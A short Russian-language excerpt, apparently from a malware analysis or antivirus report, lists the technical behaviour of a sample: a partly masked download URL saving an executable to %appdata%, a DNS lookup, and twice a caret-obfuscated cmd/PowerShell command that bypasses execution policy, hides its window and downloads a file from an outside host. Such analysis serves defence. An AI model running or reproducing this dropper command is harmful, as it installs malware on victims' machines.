Техническая информация
- http://as###itlecn.bid/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwe^rshe^lL.exe^ -^exE^cU^TionPOlI^C^Y by^p^a^Ss -n^oPRofi^Le^ ^-W^iNdO^W^sTYle ^HiDD^E^n (N^e^w-^oBJ^e^Ct s^Y^S^t^em.N^eT^.W^E^BcL^ieNT).^d^OWnLOaDfiLe('http://as###itl...
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "POwe^rshe^lL.exe^ -^exE^cU^TionPOlI^C^Y by^p^a^Ss -n^oPRofi^Le^ ^-W^iNdO^W^sTYle ^HiDD^E^n (N^e^w-^oBJ^e^Ct s^Y^S^t^em.N^eT^.W^E^BcL^ieNT).^d^OWnLOaDfiLe('http://as###itl...' (со скрытым окном)